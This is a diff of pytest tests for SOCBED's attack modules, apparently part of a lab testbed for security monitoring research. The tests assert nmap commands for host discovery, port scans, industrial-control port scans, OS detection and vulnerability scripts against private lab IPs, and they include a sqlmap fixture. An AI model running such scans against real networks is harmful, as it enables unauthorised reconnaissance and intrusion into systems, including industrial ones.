+++ b/src/attacks/tests/test_attack_nmap_host_discovery.py
@@ -0,0 +1,31 @@
+from attacks.attack_nmap_host_discovery import (
+ NmapHostDiscoveryAttack,
+ NmapHostDiscoveryAttackOptions,
+)
+from attacks.tests.test_ssh_client_stub import SSHClientStub
+
+
+def test_nmap_portscan_attack_options_defaults():
+ options = NmapHostDiscoveryAttackOptions()
+
+ assert options.target == "192.168.56.1/23"
+
+
+def test_nmap_portscan_attack_with_defaults():
+ ssh_client = SSHClientStub()
+ attack = NmapHostDiscoveryAttack(ssh_client=ssh_client)
+
+ attack.run()
+
+ assert ssh_client.exec_command == "nmap -T5 -n -sn 192.168.56.1/23"
+ assert attack.options.target == "192.168.56.1/23"
+
+
+def test_nmap_portscan_attack_with_custom_options():
+ ssh_client = SSHClientStub()
+ options = NmapHostDiscoveryAttackOptions(target="192.168.30.11")
+ attack = NmapHostDiscoveryAttack(options, ssh_client=ssh_client)
+
+ attack.run()
+
+ assert ssh_client.exec_command == "nmap -T5 -n -sn 192.168.30.11"
diff --git a/src/attacks/tests/test_attack_nmap_portscan.py b/src/attacks/tests/test_attack_nmap_portscan.py
new file mode 100644
index 0000000..424c1f9
--- /dev/null
+++ b/src/attacks/tests/test_attack_nmap_portscan.py
@@ -0,0 +1,72 @@
+from attacks.attack_nmap_portscan import NmapPortscanAttack, NmapPortscanAttackOptions
+from attacks.tests.test_ssh_client_stub import SSHClientStub
+
+DEFAULT_IP = "192.168.56.101"
+
+
+def test_nmap_portscan_attack_options_defaults():
+ options = NmapPortscanAttackOptions()
+
+ assert options.target == DEFAULT_IP
+ assert options.scan_type == "-sT -sU"
+ assert options.ports == "top10"
+
+
+def test_nmap_portscan_attack_with_defaults(capfd):
+ ssh_client = SSHClientStub()
+ attack = NmapPortscanAttack(ssh_client=ssh_client)
+
+ attack.run()
+ out, err = capfd.readouterr()
+
+ assert ssh_client.exec_command == f"sudo nmap -T5 -n -sT -sU {DEFAULT_IP} --top-ports 10"
+ assert attack.options.target == DEFAULT_IP
+
+ assert (
+ out.rstrip()
+ == f"\x1b[1m\x1b[92mRunning => \x1b[0m\x1b[94msudo nmap -T5 -n -sT -sU {DEFAULT_IP} "
+ "--top-ports 10\x1b[0m"
+ )
+ assert not err.rstrip()
+
+
+def test_nmap_portscan_attack_with_custom_options(capfd):
+ ssh_client = SSHClientStub()
+ options = NmapPortscanAttackOptions(
+ target="192.168.30.12", scan_type="-sU", ports="2404,22,80", speed="MEDIUM"
+ )
+ attack = NmapPortscanAttack(options, ssh_client=ssh_client)
+
+ attack.run()
+ out, err = capfd.readouterr()
+
+ assert ssh_client.exec_command == "sudo nmap -T3 -n -sU 192.168.30.12 -p 2404,22,80"
+
+ assert (
+ out.rstrip() == "\x1b[1m\x1b[92mRunning => \x1b[0m\x1b[94msudo nmap -T3 -n -sU "
+ "192.168.30.12 -p 2404,22,80\x1b[0m"
+ )
+ assert not err.rstrip()
+
+
+def test_nmap_portscan_attack_with_custom_options_ics(capfd):
+ ssh_client = SSHClientStub()
+ options = NmapPortscanAttackOptions(target="192.168.30.12", scan_type="-sU -sT", ports="ics")
+ attack = NmapPortscanAttack(options, ssh_client=ssh_client)
+
+ attack.run()
+ out, err = capfd.readouterr()
+
+ assert (
+ ssh_client.exec_command == "sudo nmap -T5 -n -sU -sT 192.168.30.12 -p "
+ "U:47808,20000,34980,2222,44818,55000-55003,1089-1091,34962-34964,4000,161,"
+ "T:20000,44818,1089-1091,102,502,4840,80,443,34962-34964,4000,2404"
+ )
+
+ assert (
+ out.rstrip()
+ == "\x1b[1m\x1b[92mRunning => \x1b[0m\x1b[94msudo nmap -T5 -n -sU -sT 192.168.30.12 -p "
+ "U:47808,20000,34980,2222,44818,55000-55003,1089-1091,34962-34964,4000,161,"
+ "T:20000,44818,1089-1091,102,502,4840,80,443,34962-34964,4000,2404\x1b[0m"
+ )
+ assert not err.rstrip()
diff --git a/src/attacks/tests/test_attack_nmap_service_discovery.py b/src/attacks/tests/test_attack_nmap_service_discovery.py
new file mode 100644
index 0000000..21880cc
--- /dev/null
+++ b/src/attacks/tests/test_attack_nmap_service_discovery.py
@@ -0,0 +1,96 @@
+import pytest
+
+from attacks.attack_nmap_service_discovery import NmapServiceDiscoveryAttack
+from attacks.attack_nmap_service_discovery import NmapServiceDiscoveryAttackOptions as Options
+from attacks.tests.test_ssh_client_stub import SSHClientStub
+
+DEFAULT_IP = "192.168.56.101"
+
+
+def test_nmap_service_discovery_format_arg():
+ attack = NmapServiceDiscoveryAttack
+
+ assert attack.format_arg("-p", "22,80,22,23,443,443", "161") == " -p 161,22,80,23,443"
+ assert attack.format_arg("--exclude-ports", "1337,99") == " --exclude-ports 1337,99"
+ assert (
+ attack.format_arg("--script", "ssh-auth-methods,vuln") == " --script ssh-auth-methods,vuln"
+ )
+
+
+def test_nmap_service_discovery_options_defaults():
+ options = Options()
+
+ assert options.target == DEFAULT_IP
+ assert options.scan_type == "comprehensive"
+ assert not options.port
+ assert not options.script
+
+
+def test_nmap_service_discovery_with_defaults():
+ ssh_client = SSHClientStub()
+ attack = NmapServiceDiscoveryAttack(ssh_client=ssh_client)
+
+ attack.run()
+
+ assert ssh_client.exec_command == f"sudo nmap -T5 -n -A {DEFAULT_IP}"
+
+
+@pytest.mark.parametrize(
+ "options, expected",
+ (
+ (Options(scan_type="comprehensive"), "-A"),
+ (Options(scan_type="comprehensive", exclude_ports="161"), "-A --exclude-ports 161"),
+ (Options(scan_type="os_detect"), "-O"),
+ (Options(scan_type="os_detect", script="user-script"), "-O --script user-script"),
+ (Options(scan_type="snmp_info"), "-sU -p 161 --script snmp-info"),
+ (Options(scan_type="snmp_info", script="foobar"), "-sU -p 161 --script snmp-info,foobar"),
+ (Options(scan_type="snmp"), "-sU -sV -sC -p 161"),
+ (Options(scan_type="snmp", port="162,163"), "-sU -sV -sC -p 161,162,163"),
+ (Options(scan_type="iec104_info"), "-p 2404 --script iec-identify"),
+ (Options(scan_type="iec104_info", port="22,80"), "-p 2404,22,80 --script iec-identify"),
+ (Options(scan_type="vuln"), "--script vuln"),
+ (Options(scan_type="vuln", script="foobar"), "--script vuln,foobar"),
+ (Options(scan_type="empty"), ""),
+ (Options(scan_type="empty", port="80,8080"), "-p 80,8080"),
+ (Options(scan_type="bogus"), ""),
+ ),
+)
+def test_nmap_service_discovery_with_options(options, expected):
+ prefix = "sudo nmap -T5 -n"
+ target = options.target
+ ssh_client = SSHClientStub()
+
+ attack = NmapServiceDiscoveryAttack(options, ssh_client=ssh_client)
+ attack.run()
+
+ assert ssh_client.exec_command.startswith(prefix)
+ assert ssh_client.exec_command.endswith(target)
+
+ other_options = ssh_client.exec_command[len(prefix) : -len(target)].strip()
+ assert other_options == expected
+
+
+def test_nmap_service_discovery_invalid_option_output(capfd):
+ ssh_client = SSHClientStub()
+ options = Options(
+ target="192.168.30.12",
+ scan_type="NoN_vAlId",
+ port="22,443",
+ exclude_ports="",
+ script="",
+ speed="SLOW",
+ )
+ attack = NmapServiceDiscoveryAttack(options, ssh_client=ssh_client)
+ attack.run()
+
+ out = capfd.readouterr()[0].split("\n")
+ assert out[0] == "\x1b[91mError: Invalid option: NoN_vAlId\x1b[0m"
+ assert out[1] == "\x1b[93mWarning: Default to: empty\x1b[0m"
+ assert (
+ out[2] == "\x1b[1m\x1b[92mRunning => \x1b[0m\x1b[94msudo nmap -T1 -n -p 22,443 "
+ "192.168.30.12\x1b[0m"
+ )
+ assert not out[3]
+ assert not out[4]
+
+ assert ssh_client.exec_command == "sudo nmap -T1 -n -p 22,443 192.168.30.12"
diff --git a/src/attacks/tests/test_attack_sqlmap.py b/src/attacks/tests/test_attack_sqlmap.py
index 12a2f24..1ca0a99 100644
--- a/src/attacks/tests/test_attack_sqlmap.py
+++ b/src/attacks/tests/test_attack_sqlmap.py
@@ -23,6 +23,7 @@
from attacks import AttackException
from attacks.attack_sqlmap import SQLMapAttack
+
@pytest.fixture()
def attack():
SQLMapAttack.ssh_client_class = Mock
diff --git a/src/attacks/tests/test_attackconsole.py b/src/attacks/tests/test_attackconsole.py
index 1f0443c..60f2548 100644
--- a/src/attacks/tests/test_attackconsole.py
+++ b/src/attacks/tests/test_attackconsole.py
@@ -14,15 +14,14 @@
#
# You should have received a copy of the GNU General Public License
# along with SOCBED. If not, see .
-import traceback
+
from contextlib import redirect_stdout
-from unittest.mock import Mock, patch, MagicMock
+from unittest.mock import Mock, patch
import io
import pytest
-import attacks
from attacks.attack import Attack, AttackOptions, AttackInfo, AttackException
from attacks.attackconsole import AttackConsole, SubAttackConsole, parse_args
diff --git a/src/attacks/tests/test_generateattackchains.py b/src/attacks/tests/test_generateattackchains.py
index eff24ad..92bc138 100644
--- a/src/attacks/tests/test_generateattackchains.py
+++ b/src/attacks/tests/test_generateattackchains.py
@@ -125,7 +125,7 @@ def test_blocks_run_next_to_last(self, script):
assert block[-2].split()[0] == "run"
-class TestGraphConsistency():
+class TestGraphConsistency:
start_attacks = AttackGraph.start_attacks
end_attacks = AttackGraph.end_attacks
successors = AttackGraph.attack_dict
@@ -152,7 +152,7 @@ def test_graph_consistency(self, script):
# ToDo: write test for valid end node
-class TestDeterminism():
+class TestDeterminism:
def test_same_script_for_same_seed(self):
number_of_chains = 100
assert generate_script(seed=42, number_of_chains=number_of_chains) == generate_script(
@@ -187,7 +187,7 @@ def acg(request):
return generator
-class TestAttackChainGenerator():
+class TestAttackChainGenerator:
def test_chain_sequence_contain_right_number_of_chains(self, acg: AttackChainGenerator):
acg.generate = Mock(return_value="attack_chain")
res = acg.generate_sequence(50)
@@ -214,7 +214,7 @@ class AttackDummy(Attack):
info = AttackInfo(name="attack_dummy")
-class TestAttackBlockGenerator():
+class TestAttackBlockGenerator:
abg = AttackBlockGenerator()
block = abg.generate(AttackDummy())
diff --git a/src/attacks/tests/test_nmap_attack_options.py b/src/attacks/tests/test_nmap_attack_options.py
new file mode 100644
index 0000000..342d424
--- /dev/null
+++ b/src/attacks/tests/test_nmap_attack_options.py
@@ -0,0 +1,35 @@
+import pytest
+
+from attacks.nmap_attack_options import get_speed
+
+
+class StubOptions:
+ speed = "FAST"
+
+
+@pytest.mark.parametrize(
+ "option, expected",
+ (
+ ("SLOW", 1),
+ ("MEDIUM", 3),
+ ("FAST", 5),
+ ("slOw", 1),
+ ("fAsT", 5),
+ ("medium", 3),
+ ),
+)
+def test_get_speed(option, expected):
+ options = StubOptions
+ options.speed = option
+ assert get_speed(options) == expected
+
+
+def test_get_speed_fail(capfd):
+ options = StubOptions
+ options.speed = "NOT_VALID"
+ assert get_speed(options) == 5
+
+ out, err = capfd.readouterr()
+ assert not err
+ assert out.split("\n")[0] == "\x1b[91mError: Invalid option: NOT_VALID\x1b[0m"
+ assert out.split("\n")[1] == "\x1b[93mWarning: Default to: fast\x1b[0m"
diff --git a/src/attacks/tests/test_ssh.py b/src/attacks/tests/test_ssh.py
index 32037d3..3bc5560 100644
--- a/src/attacks/tests/test_ssh.py
+++ b/src/attacks/tests/test_ssh.py
@@ -14,7 +14,7 @@
#
# You should have received a copy of the GNU General Public License
# along with SOCBED. If not, see .
-
+from unittest.mock import patch
from attacks.ssh import SSHTarget, BREACHSSHClient
@@ -75,8 +75,10 @@ def recv_exit_status(self):
class TestBREACHSSHClient:
+ default_target = SSHTarget(hostname="myhost", port=1337, username="john", password="doe")
+
def test_breachsshclient(self):
- ssh_target_1 = SSHTarget(hostname="myhost", port=1337, username="john", password="doe")
+ ssh_target_1 = self.default_target
ssh_client_1 = BREACHSSHClient(ssh_target_1)
assert ssh_client_1 is not None
assert ssh_client_1.target.hostname == "myhost"
@@ -109,10 +111,31 @@ def test_write_lines(self):
BREACHSSHClient.write_lines(mock_stdin, lines)
assert mock_stdin.lines == ["Hallo\n", "Welt\n"]
- def test_set_envs(self):
- ssh_client = BREACHSSHClient(SSHTarget())
+ @patch(
+ "attacks.ssh.BREACHSSHClient.exec_command",
+ return_value=[MockChannelFile(None, MockChannel())],
+ )
+ def test_wrap_command(self, _mock):
+ command = "echo '1234'"
+ sudo_command = "sudo echo '1234'"
+ ssh_client = BREACHSSHClient(self.default_target)
ssh_client._transport = MockTransport()
+
+ assert ssh_client.wrap_command(command) == f"PYTHONUNBUFFERED=1 grc --colour=on {command}"
assert (
- ssh_client.set_envs("sudo touch file.txt") == "sudo PYTHONUNBUFFERED=1 touch file.txt"
+ ssh_client.wrap_command(sudo_command)
+ == f"sudo PYTHONUNBUFFERED=1 grc --colour=on {command}"
)
- assert ssh_client.set_envs("touch file.txt") == "PYTHONUNBUFFERED=1 touch file.txt"
+
+ @patch(
+ "attacks.ssh.BREACHSSHClient.exec_command",
+ return_value=[MockChannelFile(None, MockChannel(1))],
+ )
+ def test_wrap_command_no_grc(self, _mock):
+ command = "echo '1234'"
+ sudo_command = "sudo echo '1234'"
+ ssh_client = BREACHSSHClient(self.default_target)
+ ssh_client._transport = MockTransport()
+
+ assert ssh_client.wrap_command(command) == f"PYTHONUNBUFFERED=1 {command}"
+ assert ssh_client.wrap_command(sudo_command) == f"sudo PYTHONUNBUFFERED=1 {command}"
diff --git a/src/attacks/tests/test_ssh_client_stub.py b/src/attacks/tests/test_ssh_client_stub.py
new file mode 100644
index 0000000..1d9b560
--- /dev/null
+++ b/src/attacks/tests/test_ssh_client_stub.py
@@ -0,0 +1,20 @@
+from attacks.util import print_command
+
+
+class SSHClientStub:
+ def __init__(self):
+ self.exec_command = ""
+ self.exec_commands = []
+ self.stdin_channel = ""
+ self.channel_timeout = ""
+
+ def exec_command_on_target(self, command, _unused_printer):
+ print_command(command)
+ self.exec_command = command
+
+ def exec_commands_on_target(self, command, _unused_printer):
+ print_command(command)
+ self.exec_commands.append(command)
+
+ def connect_to_target(self):
+ pass